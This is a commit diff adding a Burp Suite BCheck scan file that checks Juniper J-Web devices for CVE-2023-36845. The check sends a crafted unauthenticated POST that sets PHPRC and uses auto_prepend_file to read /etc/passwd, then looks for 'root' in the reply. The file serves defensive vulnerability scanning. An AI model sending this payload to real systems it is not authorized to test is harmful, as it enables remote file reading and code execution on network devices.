CVE-2023-36845 PHP External Variable Modification RCE Juniper

PortSwigger · Sep 30, 2023 · fe7f7e1 · fe7f7e1
1 parent 714ddb1
commit fe7f7e1
Showing 1 changed file with 26 additions and 0 deletions.
diff --git a/...bilities-CVEd/CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck b/...bilities-CVEd/CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck
@@ -0,0 +1,26 @@
+#https://vulncheck.com/blog/juniper-cve-2023-36845
+metadata:
+    language: v1-beta
+    name: "CVE-2023-36845 Juniper Networks - PHP External Variable Modification"
+    author: "Joao Paulo Assis (j0hnZ3RA)"
+    description: "Check for CVE-2023-36845."
+    tags: "CVE-2023-36845"
+
+define:
+    target_path = "/?PHPRC=/dev/fd/0"
+
+given host then
+    send request called check:
+        method: "POST"
+        replacing headers:
+            "Content-Type": "application/x-www-form-urlencoded"
+        path: {target_path}
+        body: "auto_prepend_file=\"/etc/passwd\""
+
+        if {check.response.status_code} is "200" and "root" in {check.response.body} and "Juniper" in {check.response.body} then
+            report issue:
+                severity: high
+                confidence: certain
+                detail: "A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code."
+                remediation: "Upgrade Juniper SRX firewalls and EX switches to the latest version"
+        end if